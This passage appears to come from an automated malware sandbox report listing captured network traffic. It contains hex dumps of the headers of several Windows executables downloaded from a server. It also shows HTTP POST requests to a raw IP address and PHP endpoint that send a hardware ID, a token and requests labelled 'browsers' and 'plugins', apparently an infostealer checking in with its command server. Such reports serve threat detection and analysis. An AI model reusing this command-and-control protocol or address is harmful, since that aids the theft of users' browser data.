00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 19:26:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 19:26:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 19:26:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 19:26:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 19:26:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 42 41 43 37 46 35 32 31 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="hwid"ADBAC7F521363848468766------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="build"save------JJDBAEHIJKJKEBFIEGHI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="message"browsers------KKJDGDHIDBGIECBGHJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 2d 2d 0d 0a Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="token"c9dd6a9e1e306e5e07006c4123cf048d5c2a66bf38fb78c6f1ed0d573357e643520c1cc2------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="message"plugins------CBGCBKFBGIIIECAAAKFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 64 64 36 61 39 65 31 65 33 30 36 65 35 65 30 37 30 30 36 63 34 31 32 33 63 66 30 34 38 64 35 63 32 61 36 36 62 66 33 38 66 62 37 38 63 36 66 31 65 64 30 64 35 37 33 33 35 37 65 36 34 33 35 32 30 63 31 63 63 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 